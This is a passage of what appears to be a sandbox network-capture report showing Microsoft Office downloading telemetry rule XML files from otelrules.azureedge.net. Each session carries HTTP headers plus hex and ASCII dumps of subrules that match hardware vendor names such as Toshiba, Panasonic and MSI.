                                                                                                                                                                                        2024-11-24 01:13:37 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        41192.168.2.54975113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:37 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:37 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                        x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011337Z-178bfbc474b7cbwqhC1NYC8z4n0000000560000000009ns2
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        42192.168.2.54975313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:37 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:37 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                        x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011337Z-174c587ffdftjz9shC1TEBsh9800000003kg00000000bukz
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:37 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        43192.168.2.54975413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:37 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:37 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                        x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011337Z-174c587ffdf6b487hC1TEBydsn00000003k000000000pgkh
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:37 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        44192.168.2.54975213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:37 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:37 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                        x-ms-request-id: 74046e45-401e-000a-0635-3c4a7b000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011337Z-178bfbc474btrnf9hC1NYCb80g00000005ag00000000hhmm
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:37 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        45192.168.2.54975513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:39 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:39 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                                        x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011339Z-178bfbc474bvjk8shC1NYC83ns000000054g000000006qdx
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:39 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        46192.168.2.54975613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:39 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:39 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                        x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011339Z-178bfbc474btvfdfhC1NYCa2en00000005dg000000002u23
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:39 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        47192.168.2.54975713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:39 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:39 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                                        x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011339Z-178bfbc474bq2pr7hC1NYCkfgg000000059g00000000hqyb
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:40 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        48192.168.2.54976113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:39 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:39 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                        x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011339Z-174c587ffdfmrvb9hC1TEBtn3800000003sg0000000081qw
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:40 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        49192.168.2.54976413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:39 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:40 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                        x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011340Z-174c587ffdf9xbcchC1TEBxkz400000003q0000000000vmn
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        50192.168.2.54976813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:41 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:41 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                                        Connection: close
